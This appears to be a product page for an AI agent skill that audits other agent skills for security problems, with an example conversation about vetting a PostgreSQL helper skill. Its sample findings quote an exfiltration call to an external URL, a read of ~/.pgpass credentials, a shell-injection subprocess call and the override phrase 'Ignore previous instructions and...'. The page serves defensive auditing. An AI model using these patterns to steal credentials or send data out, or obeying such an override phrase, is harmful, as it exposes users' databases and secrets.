Skill Security Auditor
Security audit and vulnerability scanner for AI agent skills.
$skillfish add ~skills/skill-security-auditor Real Conversations
See how the Skill Security Auditor skill responds to actual requests. These are representative examples of what your AI agent will produce.
I found a skill called database-query-helper on GitHub from an account I don't recognize. It has Python scripts that query our PostgreSQL databases. Before I install it in our production AI agent environment, I want to make sure it's safe. How do I audit it?
This skill includes executable scripts — I'll need your permission before running them.
Before auditing, clone to an isolated temp directory (never install first, audit second):
# Clone to temp — do NOT install yet
git clone https://github.com/unknown-author/database-query-helper /tmp/skill-audit/database-query-helper
Then run the auditor:
python3 scripts/skill_security_auditor.py /tmp/skill-audit/database-query-helper --strict
For a skill that touches your databases, here's what I'd look for in the output:
Critical patterns to watch for:
- Network exfiltration — any
requests.post()to external URLs:
🔴 CRITICAL [NET-EXFIL] scripts/query_helper.py:88
Pattern: requests.post("https://external-api.com/collect", data=results)
Risk: Query results sent to external server
- Credential harvesting — reads from
~/.pgpass, env var extraction:
🔴 CRITICAL [CRED-HARVEST] scripts/query_helper.py:23
Pattern: open(os.path.expanduser('~/.pgpass'))
Risk: Reads database credentials from user home directory
- Shell injection —
subprocess.call(shell=True)with user input:
🔴 CRITICAL [CMD-INJECT] scripts/query_helper.py:45
Pattern: subprocess.call(f"psql -c '{query}'", shell=True)
Risk: SQL passed to shell — command injection via crafted query
- Prompt injection in SKILL.md:
🔴 CRITICAL [PROMPT-INJECT] SKILL.md:12
Pattern: "Ignore previous instructions and..."
Risk: Attempts to override agent system prompt
Verdict interpretation:
❌ FAILwith any CRITICAL → Do NOT install. Contact the author.⚠️ WARNonly → Review each HIGH finding manually, assess intent✅ PASS→ Safe to install in non-sensitive environments
A legitimate database skill should use subprocess.run([...], shell=False) with list args and should never make outbound network calls. If it needs to send data anywhere, that should be documented and explicit.
Get Started
How to install and use this skill in your preferred environment.
Skills are designed for AI coding agents (Claude Code, Cursor, Windsurf) and IDE-based workflows where the agent can read files, run scripts, and act on your codebase. Web-based AI can use the knowledge and frameworks, but won't have tool access.
Models & Context
Which AI models and context windows work best with this skill.
Recommended Models
Larger models produce more detailed, production-ready outputs.
Context Window
This skill's SKILL.md is typically 3–10 KB — fits in any modern context window.
All current frontier models (Claude, GPT, Gemini) support 100K+ context. Use the full window for complex multi-service work.
Pro tips for best results
Be specific
Include numbers — users, budget, RPS — so the skill can size the architecture.
Share constraints
Compliance needs, team size, and existing stack all improve the output.
Iterate
Start with a high-level design, then ask follow-ups for IaC, cost analysis, or security review.
Combine skills
Pair with companion skills below for end-to-end coverage.
Ready to try Skill Security Auditor?
Install the skill and start getting expert-level guidance in your workflow — any agent, any IDE.
$skillfish add ~skills/skill-security-auditor